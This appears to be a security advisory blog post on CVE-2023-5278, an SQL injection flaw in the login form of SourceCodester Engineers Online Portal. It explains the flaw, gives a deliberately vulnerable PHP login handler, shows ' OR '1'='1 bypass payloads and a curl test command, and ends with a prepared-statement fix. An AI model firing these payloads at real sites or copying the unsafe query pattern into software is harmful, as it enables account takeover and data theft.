A new critical vulnerability, CVE-2023-5278, was found in SourceCodester Engineers Online Portal 1.. This bug allows attackers to perform SQL Injection in the login.php file via the username and password fields. If left unchecked, this vulnerability could give attackers unauthorized access to sensitive data, user accounts, or even full system control.
If you're running this portal, you must act quickly. In this article, we break down the problem, show you how it's exploited, and tell you how to fix it.
Summary
- Vulnerability ID: CVE-2023-5278 (VDB-240906)
Bug Type: SQL Injection
- Location: login.php (username / password field)
How the Attack Happens
SQL Injection is when an attacker manipulates the input to trick the database into running harmful SQL commands. In this case, the login form does not filter dangerous characters from user input, so an attacker can send data that changes the logic of the SQL behind the scenes.
A quick look at a basic PHP login handler (simplified for illustration)
<?php
session_start();
include('db.php');
if (isset($_POST['login'])) {
$username = $_POST['username']; // unsanitized!
$password = $_POST['password']; // unsanitized!
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) == 1) {
// Login ok
$_SESSION['user'] = $username;
header("location: dashboard.php");
} else {
// Login failed
echo "Invalid login";
}
}
?>
Problem: The $username and $password variables go directly into the SQL query without any sanitization or parameterization.
Username
' OR '1'='1
Password
' OR '1'='1
The SQL becomes
SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
Because '1'='1' is always true, the query returns all users. This simple trick often logs an attacker in as the first user (commonly admin).
You could use curl from the command line to test for this vulnerability
curl -X POST http://target-site.com/login.php \
-d "username=' OR 1=1 -- &password=' OR 1=1 -- &login=Login"
References
- VulDB entry VDB-240906
- CVE-2023-5278 NVD
- SourceCodester Demo
- What is SQL Injection? (OWASP)
How to Fix This
The best way: Use prepared statements with parameterized queries. Here's how you can do it using mysqli in PHP:
<?php
session_start();
include('db.php');
if (isset($_POST['login'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$result = $stmt->get_result();
if ($result->num_rows == 1) {
$_SESSION['user'] = $username;
header("location: dashboard.php");
} else {
echo "Invalid login";
}
}
?>
Key changes
- The query uses ? placeholders, and values are safely bound, preventing attackers from injecting SQL.
Final Advice
- Patch immediately: If you use SourceCodester Engineers Online Portal 1., fix your login form now.
Never trust user input. Always sanitize and validate all data.
- Consider upgrading: If you aren’t able to patch it, look for updates or more secure alternatives.
Stay Safe
SQL injection has been one of the most damaging and simple attacks for years. CVE-2023-5278 in Engineers Online Portal is a clear reminder to never trust user data and always use secure coding practices. Be responsible and update your applications before someone finds them vulnerable.
Need help or want to check your site? Contact OWASP or reach out to security professionals for more information.
Timeline
Published on: 09/29/2023 18:15:10 UTC
Last modified on: 11/07/2023 04:23:46 UTC